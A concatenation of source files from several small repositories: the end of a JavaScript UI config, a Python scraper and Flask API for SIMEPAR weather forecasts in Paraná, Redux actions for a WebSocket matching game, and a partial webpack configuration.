className: 'item',
tag: 'div',
children: [{
tag: 'a',
css: 'position:absolute;left:100px;top:60px;width:75px;height:120px',
url: '/aa',
events: {
click: {
funName: 'complexJump',
data: {
url: 'sadf',
name: 'asdf',
params: {
q: '243'
},
query: {
id: 234
}
}
}
}
},
{
tag: 'a',
        css: 'position:absolute;left:175px;top:60px;width:75px;height:120px',
url: '/bb',
},
]
}
]
|
43621bff22b45a526b138b99aa55c02647d4899a
|
[
"JavaScript",
"Markdown"
] | 16
|
JavaScript
|
Julone/QianDianQM
|
0df22ff5b70ef20e01b2fd4a879894b520acf9fe
|
7d26175de614be292e40aa22c2a132817b840ab2
|
refs/heads/main
|
<file_sep>import re
import json
import js2xml
import requests
import datetime
from slugify import slugify
from itertools import repeat
from bs4 import BeautifulSoup
class SimeparAPI:
def __init__(self, municipio):
if not municipio:
raise Exception(
"É preciso informar um código IBGE de município do Paraná")
self.municipio = str(municipio)
self.url = "http://www.simepar.br/prognozweb/simepar/forecast_by_counties/"
self.buscaPagina()
self.processaPagina()
def buscaPagina(self):
pagina = requests.get(self.url + self.municipio)
self.pagina = pagina.text
def processaPagina(self):
soup = BeautifulSoup(self.pagina, "html5lib")
dados_javascript = soup.find_all('script', {'type': 'text/javascript'})
dados_para_buscar = dados_javascript[-1].text
expressao_buscar = re.compile(r"var info = (.*);")
retorno_buscar = json.loads(
expressao_buscar.search(dados_para_buscar).group(1))
dados_do_grafico = dados_javascript[-6].text
parsed = js2xml.parse(dados_do_grafico)
data = [d.xpath(".//array/number/@value")
for d in parsed.xpath("//property[@name='data']")]
categories = parsed.xpath(
"//property[@name='categories']//string/text()")
output = list(zip(repeat(categories), data))
previsao_saida = {}
for indice, data_previsao in enumerate(output[0][0][:15]):
previsao_saida[data_previsao] = {
'maxima': output[0][1][indice], 'minimo': output[1][1][indice]}
dados_horaria_saida = {}
dados_horaria_saida['dados'] = retorno_buscar
dados_horaria_saida['previsao_hora'] = {}
dados_horaria_saida['previsao'] = previsao_saida
for dados_container in soup.find_all('div', {'class': 'wrapper'}):
dados_data_extracao = dados_container.find(
'div', {'class': 'currentDay'})
temperatura = dados_container.find(
'span', {'class': 'currentTemp'})
data_extracao = [parte.strip()
for parte in dados_data_extracao.text.split('-')]
temperatura_extracao = temperatura.text.strip()
dados_extracao = dados_container.find(
'div', {'id': 'collapseAcci'})
dados_gerais = [' '.join(info.text.split())
for info in dados_extracao.find_all('span')]
dados_previsao_horaria_extracao = dados_container.find(
'div', {'id': 'accordion-hourly-wrapper'})
dados_horaria = dados_previsao_horaria_extracao.find_all(
'a', {'class': 'list_toggle'})
for info in dados_horaria:
dados_adicionais = {}
hora = info.find('div', {'class': 'ah-time'}).text.strip()
dados_temperatura = info.find(
'div', {'class': 'ah-temp'})
temperatura = dados_temperatura.text.strip()
tempo = dados_temperatura.find(
'i')['title'].strip()
precipitacao = info.find(
'div', {'class': 'ah-prec'}).text.strip()
vento = info.find('div', {'class': 'ah-wind'}).text.strip()
dados_adicionais['temperatura'] = temperatura
dados_adicionais['tempo'] = tempo
dados_adicionais['chuva'] = precipitacao
dados_adicionais['vento'] = vento
dados_horaria_saida['previsao_hora'][hora] = dados_adicionais
dados_gerais_horaria = dados_previsao_horaria_extracao.find_all(
'div', {'class': ['collapse', 'ah-body']})
dados_gerais_horaria_saida = {}
for info in dados_gerais_horaria:
dados = [' '.join(saida.text.split())
for saida in info.find_all('span')]
chunks = [dados[i:i+2] for i in range(0, len(dados), 2)]
for (nome, informacao) in chunks:
dados_gerais_horaria_saida[slugify(nome)] = informacao
dados_horaria_saida['previsao_hora'][hora].update(
dados_gerais_horaria_saida)
self.dados_horario = dados_horaria_saida
<file_sep># Weekend project to fetch SIMEPAR weather data automatically
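
A minimal usage sketch (illustrative values — pass any Paraná municipality's IBGE code; 4106902 below is Curitiba's):

    from simeparAPI import SimeparAPI

    dados = SimeparAPI("4106902")  # fetches and parses the forecast page
    print(dados.dados_horario["previsao"])       # daily max/min forecast
    print(dados.dados_horario["previsao_hora"])  # hourly forecast details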
<file_sep>import flask
from flask import request, jsonify
from simeparAPI import SimeparAPI
app = flask.Flask(__name__)
app.config["DEBUG"] = True
@app.route('/', methods=['GET'])
def home():
return '''<h1>SIMEPAR API</h1>
<p>Uma API protótipo para pesquisa de dados metereológicos da SIMEPAR</p>'''
@app.errorhandler(404)
def page_not_found(e):
return "<h1>404</h1><p>O recurso não foi encontrado.</p>", 404
@app.route('/api/v1/resources/forecast', methods=['GET'])
def api_filter():
query_parameters = request.args
id = query_parameters.get('id')
dados = SimeparAPI(id)
return jsonify(dados.dados_horario)
app.run()
|
f5bf6a7eb9cbc1b675e19a210763fb15ab4f1e55
|
[
"Markdown",
"Python"
] | 3
|
Python
|
aniltonjunior/simepar-api
|
e8b15c50d0bd26dbf8cb9356cfe76cf756337353
|
3fbe3bff54c2e71ffe3d03a8cbb7c217e16f9814
|
refs/heads/master
|
<file_sep>#include <stdio.h>
#include <conio.h>
int main(int argc, char* argv[])
{
FILE *in;
fopen_s(&in,"pict.jpg","rb");//открываем указанный в аргументе файл для чтения в бинарном режиме
if (in==NULL)
{
printf("Can not open the file");
_getch();
return 1; //выход
}
fclose(in);
_getch();
return 0;
}
|
3b1204a1f310c71a5758c61db30ef45e79883046
|
[
"C"
] | 1
|
C
|
emeraldtune/sepia_filter
|
c25ce3c04e2ddbf319897b5e38e2fc2b2a9e7e58
|
ebb33aec785ecb353379f65a558783ff5de362ea
|
refs/heads/master
|
<file_sep># -*- coding:utf-8 -*-
import requests
import json
import time
"""
Goal: experiment with crawling the Xigua Video feed API
"""
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36",
"cookie": "td_cookie=2895957341; wafid=aa79e1cd-16dc-421b-b94d-b20a5ebfe91c; wafid.sig=D1-hFWUnCB8JJJTV-R1e_Cdx9uI; ttwid=6828065332000769548; ttwid.sig=ec3MPPdMOxx89J6pbmB2OuU52MA; xiguavideopcwebid=6828065332000769548; xiguavideopcwebid.sig=yjuAl7rEBOyfAgDFXiIB2YRIClg; SLARDAR_WEB_ID=6e7b528c-1744-4481-8954-69b88fa6dc9a; _ga=GA1.2.1690086969.1589782861; _gid=GA1.2.1558373712.1589782861; ixigua-a-s=1; s_v_web_id=verify_kac6yx8v_ow0JbieE_IIBj_41xD_8WKa_oNG1TTArwzeg; _gat_gtag_UA_138710293_1=1"}
url = "https://www.ixigua.com/api/feedv2/feedById?_signature=gr1SjgAgEA1wkmDJc74FlIK9UpAANyM&channelId=94349543909&count=9&maxTime=0&request_from=701"
def get_info():
try:
        # current Unix timestamp in seconds, used as the maxTime paging cursor
stamp = int(time.time())
params = {
"_signature": "iAhAtAAgEA56J3Lz0Xeki4gIQKAANbX",
"channelId": "94349543909",
"count": 9,
"maxTime": stamp,
"request_from": 701
}
        # include the session headers and query params in the request
        response = requests.get(url=url, headers=headers, params=params, timeout=10)
if response.status_code == 200:
print(response.json())
except Exception as e:
print(e)
if __name__ == '__main__':
get_info()
|
a2b4dd5d34fa89f02ccaf9585d0b4b9dfe96e2c5
|
[
"Python"
] | 1
|
Python
|
pengjinfu/Net-Spider
|
570c2c79a2c160260bd3b6a7dd884f6885f91e31
|
720691393606493a02032bee6bcd66515fbb1ebc
|
refs/heads/master
|
<file_sep>import React from "react";
import { View, Text, StyleSheet, StatusBar } from "react-native";
import PropTypes from "prop-types";
import { MaterialCommunityIcons } from "@expo/vector-icons";
import { LinearGradient } from "expo-linear-gradient";
const weatherOptions = {
Thunderstorm: {
iconname: "weather-lightning",
gradient: ["#544a7d", "#ffd452"],
title: "Thunderstorm",
subtitle: "Don't go outside",
},
Drizzle: {
iconname: "weather-rainy",
gradient: ["#005AA7", "#FFFDE4"],
title: "Drizzle",
subtitle: "Humidity High",
},
Rain: {
iconname: "weather-pouring",
gradient: ["#00F260", "#0575E6"],
title: "Rain",
subtitle: "Eat buchimgea",
},
Snow: {
iconname: "weather-snowy",
gradient: ["#74ebd5", "#ACB6E5"],
title: "Snow",
subtitle: "NO!!!! I can't drive",
},
Atmosphere: {
iconname: "weather-cloudy-arrow-right",
gradient: ["#6D6027", "#D3CBB8"],
title: "Atmosphere",
subtitle: "What is Atmosphere?",
},
Clear: {
iconname: "weather-sunny",
gradient: ["#C9D6FF", "#E2E2E2"],
title: "Clear",
subtitle: "How nice weather~!",
},
Clouds: {
iconname: "weather-cloudy",
gradient: ["#ffd89b", "#19547b"],
title: "Clouds",
subtitle: "So so",
},
Haze: {
iconname: "weather-fog",
gradient: ["#bdc3c7", "#2c3e50"],
title: "Haze",
subtitle: "Listen Haze's music",
},
Mist: {
iconname: "weather-tornado",
gradient: ["#808080", "#3fada8"],
title: "Mist",
subtitle: "Chock chock",
},
Dust: {
iconname: "weather-hazy",
gradient: ["2c3e50", "fd746c"],
title: "Dust",
subtitle: "Mask on",
},
};
export default function Weather({ temp, condition }) {
return (
<LinearGradient
colors={weatherOptions[condition].gradient}
style={styles.container}
>
<StatusBar barStyle="light-content" />
<View style={styles.halfContainer}>
<MaterialCommunityIcons
size={96}
name={weatherOptions[condition].iconname}
color="white"
/>
<Text style={styles.temp}>{temp}º</Text>
</View>
<View style={{ ...styles.halfContainer, ...styles.titleContainer }}>
<View>
<Text style={styles.title}>{weatherOptions[condition].title}</Text>
<Text style={styles.subtitle}>
{weatherOptions[condition].subtitle}
</Text>
</View>
</View>
</LinearGradient>
);
}
Weather.propTypes = {
temp: PropTypes.number.isRequired,
condition: PropTypes.oneOf([
"Thunderstorm",
"Drizzle",
"Rain",
"Snow",
"Atmosphere",
"Clear",
"Clouds",
"Haze",
"Mist",
"Dust",
]).isRequired,
};
const styles = StyleSheet.create({
container: {
flex: 1,
justifyContent: "center",
alignItems: "center",
},
temp: {
fontSize: 42,
color: "white",
},
halfContainer: {
flex: 1,
justifyContent: "center",
alignItems: "center",
},
titleContainer: { paddingHorizontal: 20 },
title: {
color: "white",
fontSize: 54,
marginBottom: 10,
fontWeight: "300",
},
subtitle: { color: "white", fontSize: 24, fontWeight: "600" },
});
|
011fed2734551e81eaa7acd7b3f3d1e6e21ad8a8
|
[
"JavaScript"
] | 1
|
JavaScript
|
hyun-jip/zivi_weather
|
9f85ac4783c1a0ee0053153a2f46aa6afbd3f80b
|
0afd89042de50a4e29859c3b3efd632d15e1edb6
|
refs/heads/main
|
<file_sep>player1name=localStorage.getItem("player1name");
player2name=localStorage.getItem("player2name");
player1score=0;
player2score=0;
qturn="player1";
answerturn="player2";
document.getElementById("player1name").innerHTML=player1name+" : ";
document.getElementById("player2name").innerHTML=player2name+" : ";
document.getElementById("player1score").innerHTML=player1score;
document.getElementById("player2score").innerHTML=player2score;
document.getElementById("playerq").innerHTML="Question turn- "+player1name;
document.getElementById("playerans").innerHTML="Answer turn- "+player2name;
function send(){
getword=document.getElementById("word").value;
word=getword.toLowerCase();
console.log("word in lowercase= "+word);
charAt1=word.charAt(1);
console.log(charAt1);
lengthdivide2=Math.floor(word.length/2);
charAt2=word.charAt(lengthdivide2);
console.log(charAt2);
lengthminus1=word.length-1;
charAt3=word.charAt(lengthminus1);
console.log(charAt3);
remove1=word.replace(charAt1,"_");
remove2=remove1.replace(charAt2,"_");
remove3=remove2.replace(charAt3,"_");
console.log(remove3);
qword="<h4 id='worddisplay'>Q. "+remove3+"</h4>";
input="<br>Answer : <input type='text'i id='checkbox'>";
checkbutton="<br><br><button class='btn btn-info' onclick='check()'>Check</button>";
row=qword+input+checkbutton;
document.getElementById("output").innerHTML=row;
document.getElementById("word").value="";
}
function check()
{
getans=document.getElementById("checkbox").value;
ans=getans.toLowerCase();
console.log("answer in lowercase - "+ans);
if(ans==word){
if(answerturn=="player1"){
player1score=player1score+1;
document.getElementById("player1score").innerHTML=player1score;
}
else{
player2score=player2score+1;
document.getElementById("player2score").innerHTML=player2score;
}
}
if(qturn=="player1"){
qturn="player2"
document.getElementById("playerq").innerHTML="Question turn - "+player2name;
}
else{
qturn="player1"
document.getElementById("playerq").innerHTML="Question turn - "+player1name;
}
if(answerturn=="player1"){
answerturn="player2"
document.getElementById("playerans").innerHTML="Answer turn - "+player2name;
}
else{
answerturn="player1"
document.getElementById("playerans").innerHTML="Answer turn - "+player1name;
}
document.getElementById("output").innerHTML="";
}
|
a2f6ec8e6e2161928715c738aa15032d379b8c58
|
[
"JavaScript"
] | 1
|
JavaScript
|
SSD2009/Guessthe-word
|
a21286a654dee2c4a38019c58f2bd5317afdfaf1
|
dc99595af73ba34b50f9cc957490f490d845eaf7
|
refs/heads/master
|
<repo_name>Tomiaz/kinesivan-starbound-mods<file_sep>/CreativeMode/objects/wired/scriptbox/scripts/randomweapons.lua
-- Randomized weapon script
function randomweapons(panel)
self.weaponRarity = "common"
self.weaponLevel = 1
self.weaponClass = "assaultrifle"
self.guntext = ""
self.slider = Slider(75, 50, 120, 8, 1, 10, 1)
local h = panel.height
local pad = 5
local pad2 = 14
local padtop = 170
local buttonH = 12
local buttonW = 85
local buttonPad1 = 35
local buttonPad2 = 150
self.label = Label(pad, pad, "", 8)
local labelHead1 = Label(58, 185, "Gun Types", 8, "orange")
local labelHead2 = Label(170, 185, "Gun Rarity", 8, "orange")
self.labelHead3 = Label(112, 60, self.guntext, 8, "orange")
-- Buttons for weapon classes.
-- Button 1
local classButton1 = TextButton(buttonPad1, padtop, buttonW, buttonH, "Assault Rifle")
classButton1.onClick = function()
self.weaponClass = "assaultrifle"
end
-- Button 2
local classButton2 = TextButton(buttonPad1, padtop - pad2, buttonW, buttonH, "Grenade Launcher")
classButton2.onClick = function()
self.weaponClass = "grenadelauncher"
end
-- Button 3
local classButton3 = TextButton(buttonPad1, padtop - pad2 * 2, buttonW, buttonH, "Machine Pistol")
classButton3.onClick = function()
self.weaponClass = "machinepistol"
end
-- Button 4
local classButton4 = TextButton(buttonPad1, padtop - pad2 * 3, buttonW, buttonH, "Pistol")
classButton4.onClick = function()
self.weaponClass = "pistol"
end
-- Button 5
local classButton5 = TextButton(buttonPad1, padtop - pad2 * 4, buttonW, buttonH, "Rocket Launcher")
classButton5.onClick = function()
self.weaponClass = "rocketlauncher"
end
-- Button 6
local classButton6 = TextButton(buttonPad1, padtop - pad2 * 5, buttonW, buttonH, "Shotgun")
classButton6.onClick = function()
self.weaponClass = "shotgun"
end
-- Button 7
local classButton7 = TextButton(buttonPad1, padtop - pad2 * 6, buttonW, buttonH, "Sniper Rifle")
classButton7.onClick = function()
self.weaponClass = "sniperrifle"
end
-- Buttons for rarity levels
-- Button 1
local rarityButton1 = TextButton(buttonPad2, padtop, buttonW, buttonH, "Common")
rarityButton1.onClick = function()
self.weaponRarity = "common"
end
-- Button 2
local rarityButton2 = TextButton(buttonPad2, padtop - pad2, buttonW, buttonH, "Uncommon")
rarityButton2.onClick = function()
self.weaponRarity = "uncommon"
end
-- Button 3
local rarityButton3 = TextButton(buttonPad2, padtop - pad2 * 2, buttonW, buttonH, "Rare")
rarityButton3.onClick = function()
self.weaponRarity = "rare"
end
-- Button for spawning the weapon
local spawnButton = TextButton(180, pad, buttonW, buttonH, "Spawn weapon", "orange")
spawnButton.onClick = function()
self.weaponItem = self.weaponRarity .. self.weaponClass
world.spawnItem("generatedgun", world.entityPosition(smm.sourceId()), 1, {level = self.weaponLevel, definition = self.weaponItem})
end
-- Spawn all the UI elements
panel:add(classButton1)
panel:add(classButton2)
panel:add(classButton3)
panel:add(classButton4)
panel:add(classButton5)
panel:add(classButton6)
panel:add(classButton7)
panel:add(rarityButton1)
panel:add(rarityButton2)
panel:add(rarityButton3)
panel:add(self.slider)
panel:add(spawnButton)
panel:add(self.label)
panel:add(labelHead1)
panel:add(labelHead2)
panel:add(self.labelHead3)
return "Guns", {"Tags"}
end
function randomweaponsupdate()
self.weaponLevel = self.slider.value
self.labelText = "Gun type: " .. self.weaponClass .. "\nGun rarity: " .. self.weaponRarity .. "\nGun level: " .. self.weaponLevel
self.label.text = self.labelText
self.gunText = "Gun level (" .. self.weaponLevel .. ")"
self.labelHead3.text = self.gunText
end
smm(randomweapons, randomweaponsupdate)
<file_sep>/CreativeMode/objects/wired/scriptbox/scriptbox.lua
function init(virtual)
if not virtual then
storage.consoleStorage = storage.consoleStorage or {}
entity.setInteractive(true)
end
end
function onConsoleStorageRecieve(consoleStorage)
storage.consoleStorage = consoleStorage
end
function onInteraction(args)
local interactionConfig = entity.configParameter("interactionConfig")
local mods = entity.configParameter("mods")
interactionConfig.scriptStorage = storage.consoleStorage
for _,modScript in ipairs(mods) do
table.insert(interactionConfig.scripts, modScript)
end
interactionConfig.interactSource = args.source
interactionConfig.interactSourceId = args.sourceId
return {"ScriptConsole", interactionConfig}
end
<file_sep>/CreativeMode/objects/wired/scriptbox/scripts/samplescript.lua
-- Sample SMM script
function samplescript(panel)
local h = panel.height
local pad = 5
local buttonH = 12
local button = TextButton(pad, h - pad - buttonH, 100, buttonH, "Spawn Item")
button.onClick = function()
world.spawnItem("torch", world.entityPosition(smm.sourceId()))
end
local sliderH = 8
local slider = Slider(pad, button.y - pad - sliderH, 100, sliderH, 0, 100, 1)
local label = Label(slider.x + slider.width + pad, slider.y, "", sliderH)
label:bind("text", Binding.concat(
"Sample Slider: ", Binding(slider, "value")))
panel:add(button)
panel:add(slider)
panel:add(label)
return "Sample Mod", {"Tags"}
end
smm(samplescript)
<file_sep>/CreativeMode/objects/wired/ironbeacon/duplicatortest.lua
function init(args)
self.weaponType = "generatedgun"
self.weaponLevel = 10
self.weaponRarity = "common"
self.weaponClass = "assaultrifle"
entity.setInteractive(true)
end
function onInteraction(args)
local weaponItem = self.weaponRarity .. self.weaponClass
world.spawnItem(self.weaponType, entity.toAbsolutePosition({ 0.0, 5.0 }), 1, {level = self.weaponLevel, definition = weaponItem})
end<file_sep>/CreativeMode/objects/wired/ironbeacon/duplicator100.lua
function init(args)
entity.setInteractive(true)
end
function onInteraction(args)
local heldItem = world.entityHandItem(args.sourceId, "primary")
world.spawnItem(heldItem, entity.toAbsolutePosition({ 0.0, 5.0 }), 100)
end<file_sep>/CreativeMode/objects/wired/scriptbox/smmconsole.lua
smm = {
mods = {},
updateFunctions = {}
}
setmetatable(
smm,
{
__call = function(t, ...)
local args = table.pack(...)
assert(type(args[1]) == "function",
"The first argument must be your panel init function")
table.insert(t.mods, args[1])
if args[2] then
table.insert(t.updateFunctions, args[2])
end
end
}
)
function init()
storage = console.configParameter("scriptStorage")
local source = console.configParameter("interactSource")
local sourceId = console.configParameter("interactSourceId")
smm.source = function()
return {source[1], source[2]}
end
smm.sourceId = function()
return sourceId
end
local guiConfig = console.configParameter("gui")
local canvasRect = guiConfig.scriptCanvas.rect
local width = canvasRect[3] - canvasRect[1]
local height = canvasRect[4] - canvasRect[2]
local padding = 5
local fontSize = 14
local modList = List(padding, padding, 100, height - 8, fontSize)
modList.backgroundColor = "#635d32"
modList.borderColor = "black"
local modPanelX = modList.x + modList.width + padding
local modPanelY = modList.y
local modPanelWidth = width - modPanelX - padding
local modPanelHeight = height - modPanelY - padding
local modPanelRectSize = 2
local modPanelRect = Rectangle(modPanelX - modPanelRectSize,
modPanelY - modPanelRectSize,
modPanelWidth + modPanelRectSize * 2,
modPanelHeight + modPanelRectSize * 2,
"black", modPanelRectSize)
for k,v in ipairs(smm.mods) do
local modPanel = Panel(modPanelX, modPanelY)
modPanel.width = modPanelWidth
modPanel.height = modPanelHeight
local modName, modTags = v(modPanel)
assert(type(modName) == "string",
"Your init function must return your mod name.")
local modButton = modList:emplaceItem(modName)
modButton.modTags = modTags
modButton.borderColor = "black"
modButton.bordercolor = "gray"
modButton.backgroundColor = "#1f1f1f"
modPanel:bind("visible", Binding(modButton, "selected"))
GUI.add(modPanel)
end
GUI.add(modList)
GUI.add(modPanelRect)
table.sort(
modList.items,
function(a, b)
return a.text < b.text
end
)
end
function syncStorage()
world.callScriptedEntity(console.sourceEntity(), "onConsoleStorageRecieve", storage)
end
function update(dt)
GUI.step(dt)
for _,updateFunction in ipairs(smm.updateFunctions) do
updateFunction(dt)
end
end
function canvasClickEvent(position, button, pressed)
GUI.clickEvent(position, button, pressed)
end
function canvasKeyEvent(key, isKeyDown)
GUI.keyEvent(key, isKeyDown)
end
<file_sep>/CreativeMode/objects/wired/scriptbox/scripts/miscweapons.lua
-- Randomized weapon script
function miscweapons(panel)
self.miscLevel = 1
self.miscClass = "avianblaster"
self.miscText = ""
self.miscSlider = Slider(75, 50, 120, 8, 1, 10, 1)
local h = panel.height
local pad = 5
local pad2 = 14
local padtop = 170
local buttonH = 12
local buttonW = 85
local buttonPad1 = 5
local buttonPad2 = 95
local buttonPad3 = 185
self.miscLabel = Label(pad, pad, "", 8)
local misclabelHead2 = Label(120, 185, "Gun Type", 8, "orange")
self.misclabelHead3 = Label(112, 60, self.miscText, 8, "orange")
-- Buttons for weapon classes (row 1).
-- Button 1
local classButtonM1 = TextButton(buttonPad1, padtop, buttonW, buttonH, "Avian Blaster")
classButtonM1.onClick = function()
self.miscClass = "avianblaster"
end
-- Button 2
local classButtonM2 = TextButton(buttonPad1, padtop - pad2, buttonW, buttonH, "Avian Heavy Blaster")
classButtonM2.onClick = function()
self.miscClass = "avianheavyblaster"
end
-- Button 3
local classButtonM3 = TextButton(buttonPad1, padtop - pad2 * 2, buttonW, buttonH, "Bone Rifle")
classButtonM3.onClick = function()
self.miscClass = "boneassault"
end
-- Button 4
local classButtonM4 = TextButton(buttonPad1, padtop - pad2 * 3, buttonW, buttonH, "Bone Pistol")
classButtonM4.onClick = function()
self.miscClass = "bonepistol"
end
-- Button 5
local classButtonM5 = TextButton(buttonPad1, padtop - pad2 * 4, buttonW, buttonH, "Bone Shotgun")
classButtonM5.onClick = function()
self.miscClass = "boneshotgun"
end
-- Button 6
local classButtonM6 = TextButton(buttonPad1, padtop - pad2 * 5, buttonW, buttonH, "Cell Zapper")
classButtonM6.onClick = function()
self.miscClass = "cellzapper"
end
-- Button 7
local classButtonM7 = TextButton(buttonPad1, padtop - pad2 * 6, buttonW, buttonH, "Crossbow")
classButtonM7.onClick = function()
self.miscClass = "crossbow"
end
-- Buttons for weapon classes (row 2).
-- Button 1
local classButtonM8 = TextButton(buttonPad2, padtop, buttonW, buttonH, "Crossbow - Special")
classButtonM8.onClick = function()
self.miscClass = "crossbowspecial"
end
-- Button 2
local classButtonM9 = TextButton(buttonPad2, padtop - pad2, buttonW, buttonH, "Crossbow - Wood")
classButtonM9.onClick = function()
self.miscClass = "crossbowwood"
end
-- Button 3
local classButtonM10 = TextButton(buttonPad2, padtop - pad2 * 2, buttonW, buttonH, "Flamethrower")
classButtonM10.onClick = function()
self.miscClass = "flamethrower"
end
-- Button 4
local classButtonM11 = TextButton(buttonPad2, padtop - pad2 * 3, buttonW, buttonH, "Floran Gren. Launcher")
classButtonM11.onClick = function()
self.miscClass = "florangrenadelauncher"
end
-- Button 5
local classButtonM12 = TextButton(buttonPad2, padtop - pad2 * 4, buttonW, buttonH, "Floran Needler")
classButtonM12.onClick = function()
self.miscClass = "floranneedler"
end
-- Button 6
local classButtonM13 = TextButton(buttonPad2, padtop - pad2 * 5, buttonW, buttonH, "Globe Launcher")
classButtonM13.onClick = function()
self.miscClass = "globelauncher"
end
-- Button 7
local classButtonM14 = TextButton(buttonPad2, padtop - pad2 * 6, buttonW, buttonH, "Lightning Coil")
classButtonM14.onClick = function()
self.miscClass = "lightningcoil"
end
-- Buttons for weapon classes (row 3)
-- Button 1
local classButtonM15 = TextButton(buttonPad3, padtop, buttonW, buttonH, "Revolver")
classButtonM15.onClick = function()
self.miscClass = "revolver"
end
-- Button 2
local classButtonM16 = TextButton(buttonPad3, padtop - pad2, buttonW, buttonH, "Shatter Gun")
classButtonM16.onClick = function()
self.miscClass = "shattergun"
end
-- Button 3
local classButtonM17 = TextButton(buttonPad3, padtop - pad2 * 2, buttonW, buttonH, "Stinger Gun")
classButtonM17.onClick = function()
self.miscClass = "stingergun"
end
-- Button 4
local classButtonM18 = TextButton(buttonPad3, padtop - pad2 * 3, buttonW, buttonH, "Uzi")
classButtonM18.onClick = function()
self.miscClass = "uzi"
end
-- Button for spawning the weapon
local spawnButton3 = TextButton(180, pad, buttonW, buttonH, "Spawn weapon", "orange")
spawnButton3.onClick = function()
world.spawnItem("generatedgun", world.entityPosition(smm.sourceId()), 1, {level = self.miscLevel, definition = self.miscClass})
end
-- Spawn all the UI elements
panel:add(classButtonM1)
panel:add(classButtonM2)
panel:add(classButtonM3)
panel:add(classButtonM4)
panel:add(classButtonM5)
panel:add(classButtonM6)
panel:add(classButtonM7)
panel:add(classButtonM8)
panel:add(classButtonM9)
panel:add(classButtonM10)
panel:add(classButtonM11)
panel:add(classButtonM12)
panel:add(classButtonM13)
panel:add(classButtonM14)
panel:add(classButtonM15)
panel:add(classButtonM16)
panel:add(classButtonM17)
panel:add(classButtonM18)
panel:add(self.miscSlider)
panel:add(spawnButton3)
panel:add(self.miscLabel)
panel:add(misclabelHead2)
panel:add(self.misclabelHead3)
return "Misc. Guns", {"Tags"}
end
function miscweaponsupdate()
self.miscLevel = self.miscSlider.value
self.misclabelText = "Gun type: " .. self.miscClass .. "\nGun level: " .. self.miscLevel
self.miscLabel.text = self.misclabelText
self.miscText = "Gun level (" .. self.miscLevel .. ")"
self.misclabelHead3.text = self.miscText
end
smm(miscweapons, miscweaponsupdate)
|
0a4c92783be69c40e55927bbf34b393a93bbca6e
|
[
"Lua"
] | 7
|
Lua
|
Tomiaz/kinesivan-starbound-mods
|
e8337a70cc3d91b014316b1163ae70bbf65a7061
|
0c4f11a60a063fb4bbf04b5657e27c12f70a9f5b
|
refs/heads/master
|
<file_sep>import * as types from './types';
import { getStreams, getHasPlayed, getIsFirstItem, getIsLastItem } from '../reducers';
// Sockets config
const SOCKETS_HOST = `ws://${window.location.hostname}`;
const SOCKETS_PORT = 8000;
const SOCKETS_ENDPOINTS = ['/stream/1', '/stream/2'];
let sockets;
// Action types
export const ActionTypes = types;
// Helper
const doStreamsMatch = state =>
getStreams(state).reduce((prev, current) =>
current.color && current.number &&
prev.color === current.color && prev.number === current.number
);
// Action creators
export const checkMatch = () => (dispatch, getState) => {
// Ignore if user already played in this turn
if (getHasPlayed(getState())) return;
dispatch({
type: doStreamsMatch(getState()) ?
ActionTypes.UPDATE_SCORE_UP :
ActionTypes.UPDATE_SCORE_DOWN,
});
};
export const newStreamValue = (id, value) => (dispatch, getState) => {
// Took points away if there was a match and user didn't notice it
if (!getHasPlayed(getState()) && doStreamsMatch(getState())) {
dispatch({
type: ActionTypes.UPDATE_SCORE_DOWN,
});
}
dispatch({
type: ActionTypes.UPDATE_STREAM_VALUE,
id,
value,
});
};
export const goToHistoryPrev = () => (dispatch, getState) => {
if (getIsFirstItem(getState())) return;
dispatch({
type: ActionTypes.GO_TO_HISTORY_PREV,
});
};
export const goToHistoryNext = () => (dispatch, getState) => {
if (getIsLastItem(getState())) return;
dispatch({
type: ActionTypes.GO_TO_HISTORY_NEXT,
});
};
export const startGame = () => dispatch => {
sockets = SOCKETS_ENDPOINTS.map(endpoint =>
new WebSocket(`${SOCKETS_HOST}:${SOCKETS_PORT}${endpoint}`)
);
sockets.forEach((socket, index) => {
socket.onmessage = ({ data }) => {
dispatch(newStreamValue(index + 1, JSON.parse(data)));
};
});
dispatch({
type: ActionTypes.START_GAME,
});
};
export const endGame = () => dispatch => {
dispatch({
type: ActionTypes.STOP_GAME,
});
sockets.forEach(socket => {
socket.close();
});
};
<file_sep>const webpack = require('webpack');
const HtmlWebpackPlugin = require('html-webpack-plugin');
const ExtractTextPlugin = require('extract-text-webpack-plugin');
const StyleLintPlugin = require('stylelint-webpack-plugin');
const WebpackNotifierPlugin = require('webpack-notifier');
const autoprefixer = require('autoprefixer');
const path = require('path');
const getPlugins = env => {
const GLOBALS = {
'process.env.NODE_ENV': JSON.stringify(env),
__DEV__: env === 'development',
};
const htmlWebpackPluginOpts = {
template: 'index.html',
favicon: 'favicon.png',
xhtml: true,
};
const plugins = [
new webpack.optimize.OccurenceOrderPlugin(),
new webpack.DefinePlugin(GLOBALS),
new HtmlWebpackPlugin(htmlWebpackPluginOpts),
new ExtractTextPlugin('styles.css'),
];
if (env === 'development') {
plugins.push(
new webpack.HotModuleReplacementPlugin(),
new webpack.NoErrorsPlugin(),
new WebpackNotifierPlugin({ excludeWarnings: true }),
new StyleLintPlugin()
);
} else {
plugins.push(
new webpack.optimize.DedupePlugin(),
new webpack.optimize.UglifyJsPlugin({ minimize: true, sourceMap: false })
);
}
return plugins;
};
const getLoaders = env => {
const cssLoadersObj = env === 'development' ?
{ test: /\.css$/, loaders: ['style', 'css?sourceMap', 'postcss'] } :
{ test: /\.css$/, loader: ExtractTextPlugin.extract(['css', 'postcss']) };
const scssLoadersObj = env === 'development' ?
{ test: /\.scss$/, loaders: ['style', 'css', 'postcss', 'sass?sourceMap'] } :
{ test: /\.scss$/, loader: ExtractTextPlugin.extract(['css', 'postcss', 'sass']) };
const imageLoaders = ['url?limit=10000'];
if (env === 'production') {
imageLoaders.push(
'image-webpack?{ optimizationLevel: 7, progressive: true, pngquant: { quality: "65-90" } }'
);
}
return [
{
test: /\.js?$/,
exclude: /node_modules/,
loaders: ['react-hot', 'babel?compact=true&comments=false', 'eslint'],
},
cssLoadersObj,
scssLoadersObj,
{
test: /\.(jpe?g|png|gif|svg)$/,
loaders: imageLoaders,
},
{
test: /\.(eot(\?v=\d+\.\d+\.\d+)?|ttf(\?v=\d+\.\d+\.\d+)?|otf|woff(2)*)$/,
loader: 'url?limit=10000',
},
{
test: /\.html?$/,
loader: 'html',
},
];
};
const getEntry = env => {
const entry = [];
if (env === 'development') {
entry.push(
